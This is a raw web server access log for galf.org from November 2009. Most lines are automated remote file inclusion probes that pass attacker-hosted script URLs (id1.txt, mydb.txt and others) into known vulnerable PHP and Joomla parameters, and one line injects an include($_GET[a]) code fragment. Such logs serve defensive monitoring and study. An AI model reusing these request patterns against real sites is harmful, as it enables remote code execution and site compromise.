220.134.38.139 - - [08/Nov/2009:16:00:07 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.134.38.139 - - [08/Nov/2009:16:00:07 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.134.38.139 - - [08/Nov/2009:16:00:07 -0800] "GET /logs/access_090511.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.134.38.139 - - [08/Nov/2009:16:00:21 -0800] "GET /logs/access_090601.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:16:01:20 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:16:01:20 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.134.38.139 - - [08/Nov/2009:16:01:35 -0800] "GET /logs/access_090504.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [08/Nov/2009:16:07:06 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.30.48.8 - - [08/Nov/2009:16:07:53 -0800] "GET /logs/access_091012.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.15.232.14 - - [08/Nov/2009:16:16:07 -0800] "GET /logs/access.log//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.15.232.14 - - [08/Nov/2009:16:16:23 -0800] "GET /logs/access_090706.log//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.134.38.139 - - [08/Nov/2009:16:19:12 -0800] "GET /embed/day.php?path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.134.38.139 - - [08/Nov/2009:16:19:13 -0800] "GET /logs/access_090608.log//embed/day.php?path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.134.38.139 - - [08/Nov/2009:16:19:13 -0800] "GET /logs//embed/day.php?path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.199.14.40 - - [08/Nov/2009:16:22:48 -0800] "GET /drupal/xmlrpc.php HTTP/1.1" 404 - "-" "-" "www.galf.org"
88.84.148.109 - - [08/Nov/2009:16:29:03 -0800] "GET /nucleus/xmlrpc/server.php HTTP/1.1" 404 - "-" "-" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:16:32:21 -0800] "GET /logs//?_zb_path=http://mobilemagic.sanook.com/cache/id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:16:32:21 -0800] "GET /logs/access_090706.log//?_zb_path=http://mobilemagic.sanook.com/cache/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:16:32:22 -0800] "GET /?_zb_path=http://mobilemagic.sanook.com/cache/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
121.199.14.40 - - [08/Nov/2009:16:38:25 -0800] "GET /xmlrpc.php HTTP/1.1" 404 - "-" "-" "www.galf.org"
66.235.124.17 - - [08/Nov/2009:16:40:08 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.galf.org"
66.235.124.17 - - [08/Nov/2009:16:40:08 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.galf.org"
200.29.90.110 - - [08/Nov/2009:16:40:38 -0800] "GET /includes/class_item.php?fileExtension=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.29.90.110 - - [08/Nov/2009:16:40:38 -0800] "GET /logs//includes/class_item.php?fileExtension=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.29.90.110 - - [08/Nov/2009:16:40:39 -0800] "GET /logs/access_090420.log//includes/class_item.php?fileExtension=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.29.90.110 - - [08/Nov/2009:16:40:49 -0800] "GET /logs/access_090629.log//includes/class_item.php?fileExtension=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.13.234 - - [08/Nov/2009:16:52:45 -0800] "GET /logs/access_090316.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.pekam.gr//administrator/components/com_x-shop/languages/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.13.234 - - [08/Nov/2009:16:52:45 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.pekam.gr//administrator/components/com_x-shop/languages/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.13.234 - - [08/Nov/2009:16:52:45 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.pekam.gr//administrator/components/com_x-shop/languages/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.115.1.59 - - [08/Nov/2009:17:03:06 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
124.115.1.66 - - [08/Nov/2009:17:03:11 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
124.115.1.62 - - [08/Nov/2009:17:03:17 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
124.115.1.61 - - [08/Nov/2009:17:03:24 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
124.115.1.60 - - [08/Nov/2009:17:03:25 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
93.182.32.70 - - [08/Nov/2009:17:17:33 -0800] "GET /index.php?redir=http://www.nuhalka.ru/senux/kontol.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
93.182.32.70 - - [08/Nov/2009:17:17:33 -0800] "GET /logs/access_090720.log/index.php?redir=http://www.nuhalka.ru/senux/kontol.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
93.182.32.70 - - [08/Nov/2009:17:17:33 -0800] "GET /logs/index.php?redir=http://www.nuhalka.ru/senux/kontol.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
93.182.32.70 - - [08/Nov/2009:17:17:39 -0800] "GET /logs/access_090406.log/index.php?redir=http://www.nuhalka.ru/senux/kontol.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
93.182.32.70 - - [08/Nov/2009:17:17:44 -0800] "GET /logs/access_090720.log/index.php?redir=http://www.nuhalka.ru/senux/kontol.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
93.182.32.70 - - [08/Nov/2009:17:17:44 -0800] "GET /index.php?redir=http://www.nuhalka.ru/senux/kontol.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
93.182.32.70 - - [08/Nov/2009:17:17:44 -0800] "GET /logs/index.php?redir=http://www.nuhalka.ru/senux/kontol.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
93.182.32.70 - - [08/Nov/2009:17:17:51 -0800] "GET /logs/access_090406.log/index.php?redir=http://www.nuhalka.ru/senux/kontol.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
72.55.179.121 - - [08/Nov/2009:17:18:05 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
72.55.179.121 - - [08/Nov/2009:17:18:05 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
72.55.179.121 - - [08/Nov/2009:17:18:05 -0800] "GET /logs/access_090727.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
72.55.179.121 - - [08/Nov/2009:17:18:08 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
72.55.179.121 - - [08/Nov/2009:17:18:08 -0800] "GET /logs/access_090727.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
72.55.179.121 - - [08/Nov/2009:17:18:08 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
72.55.179.121 - - [08/Nov/2009:17:18:12 -0800] "GET /logs/access_090622.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
93.182.32.70 - - [08/Nov/2009:17:21:37 -0800] "GET /logs/access_090406.log%20/index.php?redir=http://www.nuhalka.ru/senux/kontol.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
93.182.32.70 - - [08/Nov/2009:17:21:41 -0800] "GET /logs/access_090406.log%20/index.php?redir=http://www.nuhalka.ru/senux/kontol.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
69.175.13.234 - - [08/Nov/2009:17:22:12 -0800] "GET /logs//setup.php?dir=http://www.pekam.gr//administrator/components/com_x-shop/languages/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.175.13.234 - - [08/Nov/2009:17:22:12 -0800] "GET /setup.php?dir=http://www.pekam.gr//administrator/components/com_x-shop/languages/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.175.13.234 - - [08/Nov/2009:17:22:12 -0800] "GET /logs/access.log%20%20//setup.php?dir=http://www.pekam.gr//administrator/components/com_x-shop/languages/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.175.13.234 - - [08/Nov/2009:17:23:52 -0800] "GET /logs/access_091012.log%20%20//setup.php?dir=http://www.pekam.gr//administrator/components/com_x-shop/languages/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.13.234 - - [08/Nov/2009:17:23:52 -0800] "GET /setup.php?dir=http://www.pekam.gr//administrator/components/com_x-shop/languages/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.13.234 - - [08/Nov/2009:17:23:52 -0800] "GET /logs//setup.php?dir=http://www.pekam.gr//administrator/components/com_x-shop/languages/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:17:26:07 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:17:26:07 -0800] "GET /logs/access_090720.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:17:26:07 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:17:26:31 -0800] "GET /logs/access_090316.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.13.234 - - [08/Nov/2009:17:27:59 -0800] "GET /logs/access.log//setup.php?dir=http://www.pekam.gr//administrator/components/com_x-shop/languages/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.175.13.234 - - [08/Nov/2009:17:28:27 -0800] "GET /logs/access_091012.log//setup.php?dir=http://www.pekam.gr//administrator/components/com_x-shop/languages/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.84.148.109 - - [08/Nov/2009:17:28:59 -0800] "GET /phpgroupware/xmlrpc.php HTTP/1.1" 404 - "-" "-" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:17:30:43 -0800] "GET /setup.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:17:30:43 -0800] "GET /logs/access.log//setup.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:17:30:48 -0800] "GET /logs//setup.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:17:31:29 -0800] "GET /logs/access_090504.log//setup.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:17:33:39 -0800] "GET /logs/access_090504.log%20%20//setup.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:17:34:24 -0800] "GET /logs/access_090831.log%20%20//setup.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:17:34:24 -0800] "GET /logs/access_090406.log%20%20//setup.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:17:37:44 -0800] "GET /logs/access_090316.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:17:37:44 -0800] "GET /logs/access_090720.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.182.32.70 - - [08/Nov/2009:17:37:54 -0800] "GET /logs/access_090622.log/phphtml.php?htmlclass_path=http://www.nuhalka.ru/senux/kontol.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
93.182.32.70 - - [08/Nov/2009:17:37:54 -0800] "GET /phphtml.php?htmlclass_path=http://www.nuhalka.ru/senux/kontol.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
93.182.32.70 - - [08/Nov/2009:17:37:54 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.nuhalka.ru/senux/kontol.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
93.182.32.70 - - [08/Nov/2009:17:38:42 -0800] "GET /phphtml.php?htmlclass_path=http://www.nuhalka.ru/senux/kontol.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
93.182.32.70 - - [08/Nov/2009:17:38:59 -0800] "GET /logs/access_090629.log/phphtml.php?htmlclass_path=http://www.nuhalka.ru/senux/kontol.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
93.182.32.70 - - [08/Nov/2009:17:39:44 -0800] "GET /logs/access_090629.log/phphtml.php?htmlclass_path=http://www.nuhalka.ru/senux/kontol.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:17:40:12 -0800] "GET /logs/access.log%20%20//setup.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:17:40:42 -0800] "GET /logs/access_090316.log%20%20//setup.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:17:42:59 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.85.101.11 - - [08/Nov/2009:17:48:15 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://dreamdale.com/id.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
209.85.101.11 - - [08/Nov/2009:17:48:15 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://dreamdale.com/id.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
209.85.101.11 - - [08/Nov/2009:17:48:15 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://dreamdale.com/id.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
209.85.101.11 - - [08/Nov/2009:17:48:15 -0800] "GET /logs/access_091012.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://dreamdale.com/id.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:17:50:22 -0800] "GET /include/footer.php?_path[counter]=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:17:54:54 -0800] "GET /logs/access_090518.log//include/footer.php?_path[counter]=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:17:54:54 -0800] "GET /logs//include/footer.php?_path[counter]=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:17:54:56 -0800] "GET /logs/access_090309.log//include/footer.php?_path[counter]=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:17:55:26 -0800] "GET /logs/access_091012.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:17:55:28 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:17:55:28 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:17:56:28 -0800] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "galf.org"
85.25.94.14 - - [08/Nov/2009:17:56:28 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "galf.org"
85.25.94.14 - - [08/Nov/2009:17:56:29 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "galf.org"
82.193.15.3 - - [08/Nov/2009:17:56:57 -0800] "GET /setup.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.27 - - [08/Nov/2009:17:57:25 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.galf.org"
77.234.201.119 - - [08/Nov/2009:17:58:16 -0800] "GET /logs/access.log/myevent.php?myevent_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.234.201.119 - - [08/Nov/2009:17:58:17 -0800] "GET /myevent.php?myevent_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.234.201.119 - - [08/Nov/2009:17:58:17 -0800] "GET /logs/myevent.php?myevent_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.234.201.119 - - [08/Nov/2009:17:58:26 -0800] "GET /logs/access_090810.log/myevent.php?myevent_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:17:59:11 -0800] "GET /logs//main.php?sayfa=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:17:59:11 -0800] "GET /main.php?sayfa=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:17:59:11 -0800] "GET /logs/access_090608.log//main.php?sayfa=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:17:59:27 -0800] "GET /logs/access_090803.log//main.php?sayfa=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:18:00:42 -0800] "GET /logs/access_091012.log%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:18:00:49 -0800] "GET /logs/access_090525.log//main.php?sayfa=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:18:01:01 -0800] "GET /logs/access_090504.log//main.php?sayfa=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.54.130 - - [08/Nov/2009:18:01:08 -0800] "GET /logs/access.log%20%20//setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
124.0.54.130 - - [08/Nov/2009:18:01:08 -0800] "GET /logs//setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
124.0.54.130 - - [08/Nov/2009:18:01:08 -0800] "GET /setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.25.94.14 - - [08/Nov/2009:18:01:10 -0800] "GET /logs/access_090504.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:18:01:36 -0800] "GET /logs/access_090803.log%20%20//main.php?sayfa=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:18:01:36 -0800] "GET /logs/access_090608.log%20%20//main.php?sayfa=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:18:02:43 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
209.172.33.230 - - [08/Nov/2009:18:03:25 -0800] "GET /logs/access_090323.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [08/Nov/2009:18:03:25 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [08/Nov/2009:18:03:25 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
